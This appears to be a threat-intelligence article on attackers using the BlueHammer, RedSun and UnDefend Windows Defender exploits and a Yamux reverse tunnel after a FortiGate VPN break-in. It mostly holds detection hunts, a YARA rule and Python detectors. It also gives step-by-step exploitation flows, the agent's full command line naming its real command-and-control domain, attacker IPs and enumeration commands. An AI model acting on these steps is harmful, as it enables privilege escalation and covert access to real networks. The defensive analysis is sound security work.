
Introduction
In a watershed moment for enterprise security, threat actors have deployed the newly disclosed “Nightmare-Eclipse” toolkit—comprising BlueHammer, RedSun, and UnDefend—against a live victim after gaining initial access through a compromised FortiGate SSL VPN. This marks the first confirmed in-the-wild use of these local privilege escalation (LPE) exploits, which weaponize logic flaws in Windows Defender’s own operations to achieve SYSTEM-level access or cripple antivirus defenses entirely.
Learning Objectives
- Understand how Nightmare-Eclipse tools exploit TOCTOU race conditions and cloud file callbacks in Windows Defender to read the SAM database and overwrite system files.
- Learn to detect FortiGate SSL VPN credential abuse by analyzing multi-geography authentication patterns and anomalous tunneling traffic.
- Master hands-on hunting and mitigation strategies, including YARA rules, log analysis, and emergency response playbooks.
You Should Know
1. Dissecting BlueHammer: Stealing the SAM Database by Freezing Defender
The BlueHammer exploit (CVE-2026-33825) demonstrates a sophisticated Time-of-Check Time-of-Use (TOCTOU) race condition that leverages Windows Defender’s own remediation workflow to read the Security Account Manager (SAM) hive. Attackers start by polling the Windows Update API for a pending update and copying its files locally. They then write the standard EICAR test string to disk, forcing Defender to create a frozen Volume Shadow Copy (VSS) as part of its quarantine process.
By placing an opportunistic lock (oplock) on a system file that Defender accesses during scans, the exploit can precisely time when Defender is suspended. It then registers a fake cloud sync provider—structurally identical to OneDrive—and places a file inside its directory. When Defender enumerates that directory, the callback fires, and BlueHammer confirms Defender’s identity before holding a lock on the file, causing Defender’s scan thread to wait indefinitely.
With a frozen VSS containing an unlocked copy of the SAM database and a suspended Defender process, BlueHammer instructs Defender to import a signature update from a staged location. During the file-open operation, the exploit swaps the path to point directly at the SAM database within the frozen VSS. Defender, believing it is reading a definition file, writes the SAM contents to its output directory, where BlueHammer retrieves a handle to the credential hive.
Step‑by‑step exploitation flow:
- Reconnaissance – Poll Windows Update API for pending updates.
- Trigger VSS freeze – Write EICAR test string to disk; Defender creates a frozen volume snapshot.
- Synchronization – Place an oplock on a system file Defender accesses mid‑scan; when lock breaks, scan is confirmed in progress.
- Register fake cloud provider – Create a directory with a callback that identifies Defender.
- Suspend Defender – Place a lock on a file Defender tries to open; scan thread waits indefinitely.
- Redirect read – Instruct Defender to import a signature update from a staged location; swap the path to point to the SAM database inside the frozen VSS.
- Extract credentials – Defender writes SAM to its output directory; BlueHammer parses the hive and decrypts NT hashes.
- Password change & token theft – Change each user’s password to `$PWNed666!!!WDFAIL`, generate admin sessions, copy the SYSTEM token, and spawn a SYSTEM shell.
Detection commands (Windows):
# Hunt for BlueHammer staging artifacts (the * in the path covers every user profile)
Get-ChildItem -Path C:\Users\*\Pictures\ -Include FunnyApp.exe -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\*\Downloads\ -Include RedSun.exe, undef.exe, z.exe -Recurse -ErrorAction SilentlyContinue
# Check for EICAR test string writes (-like needs the * wildcards to match inside the message text)
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Windows Defender/Operational'; ID=1116} | Where-Object {$_.Message -like '*EICAR*'}
# Look for Defender detection of BlueHammer
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Windows Defender/Operational'; ID=1116} | Where-Object {$_.Message -like '*Exploit:Win32/DfndrPEBluHmr.BZ*'}
2. RedSun: Overwriting System32 Binaries via Cloud File Trickery
RedSun achieves SYSTEM-level access by overwriting `TieringEngineService.exe` in `C:\Windows\System32` using a race condition in Defender’s Cloud File detection and remediation handling. The exploit creates a staging directory in %TEMP%, writes the EICAR test string as TieringEngineService.exe, and opens the file with `FILE_EXECUTE` access to trigger a Defender scan.
Using an oplock on the VSS version of the file, RedSun waits for Defender to begin scanning. Once scanning starts, the original file is deleted, and the directory is registered as a Cloud Files sync root with a placeholder at TieringEngineService.exe. The working directory is renamed, the original path re-created as empty, and the placeholder file reopened—acquiring another oplock. In the TOCTOU window, the empty directory is converted to a mount point pointing to C:\Windows\System32. When Defender attempts to restore the “malicious file,” it writes `RedSun.exe` directly into C:\Windows\System32\TieringEngineService.exe—a location unprivileged users normally cannot write to. RedSun then calls the Storage Tiers Management COM object (running as SYSTEM), which executes the dropped binary and spawns a SYSTEM shell.
Step‑by‑step exploitation:
- Stage payload – Create `%TEMP%\RS-{GUID}\TieringEngineService.exe` (EICAR string).
- Trigger scan – Open the file with `FILE_EXECUTE`; Defender scans it.
- Oplock sync – Acquire an oplock on the VSS version; when scanning starts, delete the original file.
- Register cloud root – Mark the directory as a Cloud Files sync root with a placeholder.
- TOCTOU swap – Rename the directory to `.TMP`, re‑create the empty original path, reopen the placeholder, acquire an oplock, then rename the placeholder to `.TEMP2` and mark it for deletion.
- Mount point redirect – Convert the empty directory to a mount point targeting `C:\Windows\System32`.
- Write to System32 – Defender restores the file to `C:\Windows\System32\TieringEngineService.exe` (RedSun copy).
- Elevate – Call the Storage Tiers Management COM object (SYSTEM), which executes the dropped binary and spawns a SYSTEM shell.
Detection commands:
# Hunt for RedSun staging artifacts
Get-ChildItem -Path C:\Users\*\Downloads\ -Include RedSun.exe -Recurse -ErrorAction SilentlyContinue
# Check for EICAR alerts tied to TieringEngineService.exe
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Windows Defender/Operational'; ID=1116} | Where-Object {$_.Message -like '*TieringEngineService.exe*'}
# Monitor for unexpected TieringEngineService.exe executions
# (in event 4688, Properties[5] is NewProcessName and Properties[13] is ParentProcessName)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Where-Object {$_.Properties[5].Value -like '*\TieringEngineService.exe'}
3. UnDefend: Disabling Defender Signature Updates Without Admin Rights
UnDefend is a Windows Defender “killer” that, unlike traditional LPEs, operates as a denial-of-service (DoS) tool preventing Defender from receiving definition updates. It runs entirely with standard user privileges and watches Defender’s Definition Updates directory and the Malicious Software Removal Tool directory using directory change notifications. When a new or modified definition file appears, UnDefend races to open and lock the file before Defender can use it. Backup definition files (mpavbase.lkg and mpavbase.vdm) are locked immediately at startup.
More critically, UnDefend registers a service status notification for `WinDefend` and waits for the service to stop. When that occurs—during any service stop event, not just major updates—it immediately locks `mpavbase.vdm` at the active signature location, preventing Defender from reloading its signature base upon restart. These locks are held in memory as open handles; when UnDefend’s process exits, the OS releases all handles and Defender recovers. This provides disruption only while the tool is running, but that window is sufficient for an attacker to execute further payloads without detection.
Step‑by‑step disruption:
- Start monitoring – Launch `undef.exe` (or `z.exe`) from a user‑writable directory.
- Lock definition files – Immediately lock `mpavbase.lkg` and `mpavbase.vdm`.
- Watch for updates – Monitor the Definition Updates and MRT directories for file changes.
- Race to lock – When a new definition file appears, open and lock it before Defender can.
- Service stop detection – Register for `WinDefend` service stop notifications.
- Prevent reload – Upon service stop, lock the active signature location, blocking Defender from reloading signatures on restart.
Detection commands:
# Hunt for UnDefend binaries
Get-ChildItem -Path C:\Users\*\Downloads\ -Include undef.exe, z.exe -Recurse -ErrorAction SilentlyContinue
# Look for anomalous file locks on Defender definition files (requires Sysinternals Handle)
handle.exe -a mpavbase.vdm
# Check for WinDefend service stop events
# (the 7036 message reads "The Windows Defender Antivirus Service service entered the stopped state.")
Get-WinEvent -FilterHashtable @{LogName='System'; ID=7036} | Where-Object {$_.Message -like '*Windows Defender Antivirus Service*stopped*'}
4. BeigeBurrow: The Covert Yamux Tunnel That Succeeded
Unlike the failed privilege escalation attempts, the Go‑compiled binary `agent.exe` (dubbed BeigeBurrow) successfully established a persistent, multiplexed reverse tunnel to attacker‑controlled infrastructure. It uses HashiCorp’s Yamux library to create a single outbound TCP connection over port 443—a port rarely blocked by enterprise firewalls—and then multiplexes multiple streams over that single connection.
BeigeBurrow accepts three command‑line flags: `-server` (C2 address), `-hide` (hide console window), and `-chain` (daisy‑chaining, non‑functional in this build). Once running, it enters an infinite loop calling runAgent(). If the connection fails, it sleeps for 5 minutes and retries indefinitely. When connected, it creates a Yamux session with default configuration and waits for the operator to open new streams. For each stream, the agent reads a newline‑terminated target address (e.g., 10.0.0.5:445\n), strips the newline, dials the specified host:port over TCP, and relays traffic bidirectionally between the C2 stream and the target. This gives the operator full internal network access from the compromised host.
Step‑by‑step tunneling:
- Execute agent – Run `agent.exe -server staybud.dpdns[.]org:443 -hide`.
- Hide console – The console window is hidden for stealth.
- Connect to C2 – Establish a TCP connection to the C2 on port 443.
- Yamux session – Create a multiplexed session using the default configuration.
- Stream handling – For each new stream, read the target address (e.g., `192.168.1.100:3389`), dial TCP, and relay traffic.
- Persist – If the connection drops, retry every 5 minutes indefinitely.
Detection commands:
# Hunt for agent.exe executions (Properties[5] = NewProcessName in event 4688)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Where-Object {$_.Properties[5].Value -like '*\agent.exe'} | Format-List
# Check for outbound connections to the C2 domain
# (netstat -ano prints numeric addresses, so resolve the name first and compare against remote IPs)
$c2 = (Resolve-DnsName staybud.dpdns.org -Type A -ErrorAction SilentlyContinue).IPAddress
Get-NetTCPConnection -RemotePort 443 -ErrorAction SilentlyContinue | Where-Object {$_.RemoteAddress -in $c2}
# Monitor for processes with hidden windows (using PowerShell)
Get-Process | Where-Object {$_.MainWindowTitle -eq '' -and $_.ProcessName -eq 'agent'} | Format-List
# Search for the BeigeBurrow SHA-256 hash (known sample)
Get-ChildItem -Path C:\ -Include *.exe -Recurse -ErrorAction SilentlyContinue | Get-FileHash -Algorithm SHA256 | Where-Object {$_.Hash -eq 'a2b6c7a9c4490df70de3cdbfa5fc801a3e1cf6a872749259487e354de2876b7c'}
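The 5‑minute retry loop described above is itself a detectable trait: a non‑browser process that reattempts the same host:443 at a near‑constant interval. The following is an added example written for this page, not code from the Huntress report or from the BeigeBurrow sample; it takes a list of outbound connection attempts (process name, remote host, remote port, Unix timestamp, as a sensor or firewall log would provide), groups them per process and destination, and flags groups whose gaps cluster around the expected period. The allowlist of web‑client process names and the connection records are constructed for the demonstration.

```python
"""Spot fixed-interval reconnects of the kind BeigeBurrow produces.

Added example (not from the Huntress report or the BeigeBurrow binary):
groups outbound connection attempts per process/destination and flags
groups whose inter-attempt gaps sit around a fixed period, which is what
the agent's "sleep 5 minutes and retry" loop looks like from the outside.
"""
from collections import defaultdict
from statistics import median

# Processes expected to hold many 443 connections; an assumption for the demo.
BROWSER_LIKE = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe"}


def periodicity(timestamps, expected_period, tolerance=0.1):
    """True when at least three attempts exist and the median gap between
    consecutive attempts lies within tolerance of expected_period."""
    if len(timestamps) < 3:
        return False
    ts = sorted(timestamps)
    gaps = [later - earlier for earlier, later in zip(ts, ts[1:])]
    return abs(median(gaps) - expected_period) <= expected_period * tolerance


def find_beacons(records, port=443, period=300):
    """records: iterable of (process, remote_host, remote_port, unix_ts).
    Returns a sorted list of (process, remote_host) pairs that look like
    retry loops toward the given port."""
    groups = defaultdict(list)
    for process, host, rport, ts in records:
        if rport == port and process.lower() not in BROWSER_LIKE:
            groups[(process.lower(), host)].append(ts)
    return sorted(key for key, stamps in groups.items() if periodicity(stamps, period))


# Constructed sample: agent.exe retrying its C2 every ~300 s while the
# connection is refused, a browser with irregular traffic, and a tool that
# connected only twice (too few attempts to call periodic).
T0 = 1_776_000_000
SAMPLE_RECORDS = [
    ("agent.exe", "staybud.dpdns.org", 443, T0),
    ("agent.exe", "staybud.dpdns.org", 443, T0 + 300),
    ("agent.exe", "staybud.dpdns.org", 443, T0 + 601),
    ("agent.exe", "staybud.dpdns.org", 443, T0 + 900),
    ("chrome.exe", "example.com", 443, T0 + 5),
    ("chrome.exe", "example.com", 443, T0 + 12),
    ("chrome.exe", "example.com", 443, T0 + 700),
    ("curl.exe", "updates.example.net", 443, T0 + 100),
    ("curl.exe", "updates.example.net", 443, T0 + 400),
]

if __name__ == "__main__":
    for proc, host in find_beacons(SAMPLE_RECORDS):
        print(f"possible retry loop: {proc} -> {host}:443")
```

The median is used rather than the mean so that one long outage or a single burst does not mask an otherwise regular cadence; on real telemetry the allowlist should be replaced by a baseline of which processes normally talk to port 443 on each host.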
5. FortiGate SSL VPN: The Initial Access Vector
Customer‑provided VPN logs revealed the entry point: on April 15, 2026 at 13:44 UTC, an attacker initiated an SSL VPN connection to a FortiGate firewall using valid user credentials from IP `78.29.48[.]29` (Russia). Subsequent unauthorized sessions from the same account were observed from `212.232.23[.]69` (Singapore) and `179.43.140[.]214` (Switzerland)—a multi‑geography access pattern consistent with credential abuse and potential credential resale.
FortiGate log analysis commands:
# SSH into the FortiGate and check SSL VPN logs
diagnose vpn ssl list
get log memory | grep -i "ssl vpn"
execute log display | grep -E "78.29.48.29|212.232.23.69|179.43.140.214"
# Check for multiple geographies from the same user in a short timeframe (requires log aggregation; run on the syslog collector)
zgrep "ssl.user=username" /var/log/fortigate/*.log | awk '{print $1, $2, $NF}' | sort | uniq -c
# Enable detailed SSL VPN logging (if not already enabled)
config log setting
set vpn enable
end
Detection rules for SIEM:
Splunk query: same user authenticating from more than 2 distinct countries within 1 hour
index=fortigate sourcetype=vpn_log | stats values(geoip.country_name) as countries, earliest(_time) as first, latest(_time) as last by user | where mvcount(countries) > 2 AND (last - first) < 3600
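The same rule can be applied outside a SIEM to raw FortiGate key=value log lines. The script below is an added example for this page (not Huntress or Undercode code): it parses `tunnel-up` events, resolves each source IP to a country through a small lookup table that stands in for a GeoIP database, and flags any user who reaches three or more countries within one hour. It goes slightly beyond the Splunk query above, which compares only the earliest and latest event of the whole search, by sliding a one‑hour window over each user's events in time order. The log lines, timestamps and the corporate `203.0.113.10` address are constructed; the three foreign IPs are those named in the report.

```python
"""Flag VPN accounts authenticating from several countries within one hour.

Added example, not from the Huntress report: parses FortiGate-style
key=value SSL VPN log lines and applies a sliding one-hour window per user.
"""
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed stand-in for a GeoIP database. The first three addresses are
# the ones reported; the fourth is an invented corporate address.
GEOIP = {
    "78.29.48.29": "Russia",
    "212.232.23.69": "Singapore",
    "179.43.140.214": "Switzerland",
    "203.0.113.10": "Germany",
}

# Constructed sample lines in the FortiGate key=value style (times invented).
SAMPLE_LOGS = """\
date=2026-04-15 time=13:44:02 logid="0101039947" type="event" subtype="vpn" action="tunnel-up" tunneltype="ssl-web" user="jdoe" remip=78.29.48.29
date=2026-04-15 time=14:02:10 logid="0101039947" type="event" subtype="vpn" action="tunnel-up" tunneltype="ssl-web" user="jdoe" remip=212.232.23.69
date=2026-04-15 time=14:31:55 logid="0101039947" type="event" subtype="vpn" action="tunnel-up" tunneltype="ssl-web" user="jdoe" remip=179.43.140.214
date=2026-04-15 time=09:00:00 logid="0101039947" type="event" subtype="vpn" action="tunnel-up" tunneltype="ssl-web" user="asmith" remip=203.0.113.10
date=2026-04-15 time=17:00:00 logid="0101039947" type="event" subtype="vpn" action="tunnel-up" tunneltype="ssl-web" user="asmith" remip=78.29.48.29
"""

# key=value pairs; values are either double-quoted or a bare token
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_line(line):
    """Turn one log line into a dict with a UTC timestamp, user, IP and action."""
    fields = {k: v.strip('"') for k, v in KV_RE.findall(line)}
    ts = datetime.strptime(f"{fields['date']} {fields['time']}", "%Y-%m-%d %H:%M:%S")
    return {
        "ts": ts.replace(tzinfo=timezone.utc),
        "user": fields["user"],
        "ip": fields["remip"],
        "action": fields["action"],
    }


def find_multi_geo_users(log_text, window_seconds=3600, min_countries=3):
    """Return {user: set_of_countries} for every user whose tunnel-up events
    span at least min_countries distinct countries inside some window."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        if ev["action"] != "tunnel-up":
            continue
        ev["country"] = GEOIP.get(ev["ip"], "unknown")
        events[ev["user"]].append(ev)

    flagged = {}
    for user, evs in events.items():
        evs.sort(key=lambda e: e["ts"])
        # Slide the window: each event in turn opens a window of window_seconds.
        for i, start in enumerate(evs):
            countries = set()
            for ev in evs[i:]:
                if (ev["ts"] - start["ts"]).total_seconds() >= window_seconds:
                    break
                countries.add(ev["country"])
            if len(countries) >= min_countries:
                flagged[user] = countries
                break
    return flagged


if __name__ == "__main__":
    for user, countries in find_multi_geo_users(SAMPLE_LOGS).items():
        print(f"{user}: {sorted(countries)} within one hour")
```

With a real GeoIP source, replace the `GEOIP` dict lookup with a call into that database; everything else stays the same. Lowering `min_countries` to 2 catches the simpler "two countries in an hour" case at the cost of more travel‑related false positives.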
6. Hands‑on‑Keyboard Enumeration: What the Attacker Did After Access
The threat actor performed active reconnaissance using standard Windows commands. Huntress documented the following enumeration sequence, indicating a live operator rather than an automated script:
- `whoami /priv` – Check the current user’s privileges.
- `cmdkey /list` – List stored credentials in Windows Credential Manager.
- `net group` – Enumerate domain groups and members.
Notably, `whoami /priv` was spawned directly from an `M365Copilot.exe` process—an anomaly investigators could not fully explain but noted occurred after initial compromise and after BlueHammer’s first execution attempt.
Detection commands:
# Hunt for enumeration commands from unusual parent processes
# (event 4688: Properties[5] = NewProcessName, Properties[13] = ParentProcessName)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Where-Object {
    $_.Properties[5].Value -match '\\(whoami|cmdkey|net1?)\.exe$' -and
    $_.Properties[13].Value -notmatch '\\(cmd|powershell)\.exe$'
} | Format-List
# Monitor for M365Copilot.exe spawning unusual children
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Where-Object {
    $_.Properties[13].Value -like '*\M365Copilot.exe'
} | Format-List
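The parent‑child observations above (and the TieringEngineService.exe and agent.exe hunts in the earlier sections) can be expressed as one small rule set over process‑creation records. The code below is an added example, not Huntress's or Undercode's: each rule runs over 4688‑style records (new process path, parent path, command line). The "TieringEngineService.exe launched by something other than services.exe or from outside System32" check is a heuristic assumed here for the demonstration, as is the M365Copilot.exe path; the records themselves are constructed.

```python
"""Rule set for the process-tree anomalies described in the report.

Added example; records are constructed 4688-style dicts. Rules:
  - enumeration utility whose parent is not an interactive shell
  - any child of M365Copilot.exe
  - TieringEngineService.exe not started by services.exe from System32
    (heuristic assumed for this example)
  - agent.exe carrying BeigeBurrow's -server/-hide flags
"""
import ntpath

ENUM_TOOLS = {"whoami.exe", "cmdkey.exe", "net.exe", "net1.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SYSTEM32 = "c:\\windows\\system32\\"


def basename(path):
    """Case-folded file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def evaluate(record):
    """Return the names of every rule that fires on one record."""
    new = basename(record["new_process"])
    parent = basename(record["parent_process"])
    cmd = record.get("command_line", "").lower()
    hits = []
    if new in ENUM_TOOLS and parent not in SHELLS:
        hits.append("enumeration-from-unusual-parent")
    if parent == "m365copilot.exe":
        hits.append("m365copilot-spawned-child")
    if new == "tieringengineservice.exe":
        in_system32 = record["new_process"].lower().startswith(SYSTEM32)
        if not in_system32 or parent != "services.exe":
            hits.append("tieringengineservice-unexpected-launch")
    if new == "agent.exe" and "-server" in cmd and "-hide" in cmd:
        hits.append("beigeburrow-command-line")
    return hits


def analyze(records):
    """Flatten rule hits across many records into (new_process, rule) pairs."""
    return [(r["new_process"], hit) for r in records for hit in evaluate(r)]


# Constructed records; the Copilot install path is an assumption.
SAMPLE_RECORDS = [
    {"new_process": r"C:\Windows\System32\whoami.exe",
     "parent_process": r"C:\Program Files\WindowsApps\M365Copilot.exe",
     "command_line": "whoami /priv"},
    {"new_process": r"C:\Windows\System32\whoami.exe",
     "parent_process": r"C:\Windows\System32\cmd.exe",
     "command_line": "whoami"},
    {"new_process": r"C:\Windows\System32\TieringEngineService.exe",
     "parent_process": r"C:\Windows\System32\services.exe",
     "command_line": r"C:\Windows\System32\TieringEngineService.exe"},
    {"new_process": r"C:\Windows\System32\TieringEngineService.exe",
     "parent_process": r"C:\Windows\System32\svchost.exe",
     "command_line": r"C:\Windows\System32\TieringEngineService.exe"},
    {"new_process": r"C:\Users\bob\Downloads\agent.exe",
     "parent_process": r"C:\Windows\System32\cmd.exe",
     "command_line": "agent.exe -server staybud.dpdns.org:443 -hide"},
]

if __name__ == "__main__":
    for process, rule in analyze(SAMPLE_RECORDS):
        print(f"{rule}: {process}")
```

Because 4688 records carry only names and paths, the TieringEngineService.exe rule cannot tell an overwritten binary from the genuine one when both are started by the Service Control Manager; pairing it with the file‑hash hunt from section 4 or with file‑integrity monitoring of System32 closes that gap.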
7. YARA Rule for BeigeBurrow Detection
Huntress has published a YARA rule to detect BeigeBurrow across enterprise environments. The rule targets the Go‑compiled binary’s unique strings and Yamux library usage.
rule BeigeBurrow_Agent {
    meta:
        description = "Detects BeigeBurrow tunneling agent"
        author = "Huntress"
        date = "2026-04-20"
    strings:
        $s1 = "yamux" wide ascii
        $s2 = "staybud.dpdns.org" wide ascii
        $s3 = "-server" wide ascii
        $s4 = "runAgent" wide ascii
        $s5 = "HashiCorp" wide ascii
    condition:
        (uint16(0) == 0x5A4D) and (any of ($s*))
}
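To see what the rule actually tests, the following added example (not Huntress's code) reimplements just its semantics in plain Python: `uint16(0) == 0x5A4D` reads a little‑endian 16‑bit value at offset 0, which is the byte pair `4D 5A` ("MZ"), and a string declared `wide ascii` matches either its raw ASCII bytes or its UTF‑16LE encoding. The sample buffers are constructed; none of them is the real binary.

```python
"""Plain-Python evaluation of the BeigeBurrow_Agent rule's logic.

Added example, not from Huntress: enough of YARA's semantics to show what
`uint16(0) == 0x5A4D and any of ($s*)` with `wide ascii` strings checks.
"""
import struct

# The rule's strings, in declaration order (matches are case-sensitive,
# since the rule does not use the nocase modifier).
RULE_STRINGS = {
    "$s1": "yamux",
    "$s2": "staybud.dpdns.org",
    "$s3": "-server",
    "$s4": "runAgent",
    "$s5": "HashiCorp",
}


def string_matches(data, text):
    """`wide ascii`: true if either the ASCII or the UTF-16LE form occurs."""
    return text.encode("ascii") in data or text.encode("utf-16-le") in data


def is_mz(data):
    """Mirror of `uint16(0) == 0x5A4D`: little-endian uint16 at offset 0."""
    return len(data) >= 2 and struct.unpack_from("<H", data, 0)[0] == 0x5A4D


def beigeburrow_rule(data):
    """Return the identifiers of the strings that matched when the rule's
    condition holds, otherwise an empty list (empty <=> no match)."""
    if not is_mz(data):
        return []
    # `any of ($s*)`: the condition is true as soon as one string is present.
    return [name for name, text in RULE_STRINGS.items() if string_matches(data, text)]


# Constructed sample buffers (the real sample is not reproduced here).
MZ_HEADER = b"MZ" + b"\x90" * 62
SAMPLE_WIDE = MZ_HEADER + "runAgent".encode("utf-16-le") + b"\x00" * 16   # UTF-16 hit on $s4
SAMPLE_ASCII = MZ_HEADER + b"github.com/hashicorp/yamux\x00"              # $s1 yes, $s5 no (case)
SAMPLE_NOT_PE = b"\x7fELF" + b"yamux"                                     # strings but no MZ
SAMPLE_CLEAN = MZ_HEADER + b"hello world"                                 # MZ but no strings

if __name__ == "__main__":
    for label, buf in [("wide", SAMPLE_WIDE), ("ascii", SAMPLE_ASCII),
                       ("not-pe", SAMPLE_NOT_PE), ("clean", SAMPLE_CLEAN)]:
        print(f"{label:7s} -> {beigeburrow_rule(buf) or 'no match'}")
```

Two points the walk‑through makes visible: Go's lowercase import path `github.com/hashicorp/yamux` does not satisfy the case‑sensitive `$s5 = "HashiCorp"` (so `$s1` is what really fires on such binaries), and because the condition is `any of`, a single generic string such as `-server` is enough to match any PE file, which makes the rule prone to false positives in a large fleet; requiring `2 of ($s*)` is a common tightening when tuning a published rule.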
What Undercode Say
- Trust no layer: The Nightmare-Eclipse campaign proves that even first‑party security software like Windows Defender can become the attack vector when logic flaws are weaponized. Organizations must adopt defense‑in‑depth and never rely on a single security control.
- Credential abuse remains the silent killer: The FortiGate VPN compromise highlights that multi‑factor authentication (MFA) is no longer optional. Attackers are buying and reselling stolen credentials, and a single compromised account with VPN access can lead to full domain takeover.
- Tool familiarity matters: The attacker’s misspelled `-agressive` flag and use of a non‑functional `-h` help flag demonstrate that even threat actors are fallible. This creates detection opportunities: anomalous command lines, repeated tool failures, and unusual parent‑child process relationships are all high‑fidelity indicators.
- BeigeBurrow is a blueprint for modern C2: Using port 443 and Yamux multiplexing, this agent achieves persistence, stealth, and full network pivoting with minimal noise. Defenders must monitor for outbound connections to suspicious domains, hidden console windows, and processes that never exit.
Prediction
The public release of BlueHammer, RedSun, and UnDefend by Chaotic Eclipse will trigger a wave of copycat intrusions over the next 3–6 months, as low‑skill actors incorporate these tools into ransomware and initial access broker campaigns. Microsoft’s patch for BlueHammer (CVE-2026-33825) will reduce but not eliminate risk, as RedSun and UnDefend remain unpatched zero‑days. Expect to see these tools bundled into automated exploit frameworks and offered as a service on underground forums. Organizations that fail to implement robust VPN MFA, endpoint detection and response (EDR) with behavioral rules, and proactive log hunting will be at critical risk. The long‑term fallout may force Microsoft to redesign Defender’s privileged operations and access controls, potentially breaking backwards compatibility—a costly but necessary evolution.
Reported By: Gurubaran Cybersecuritynews – Hackers Feeds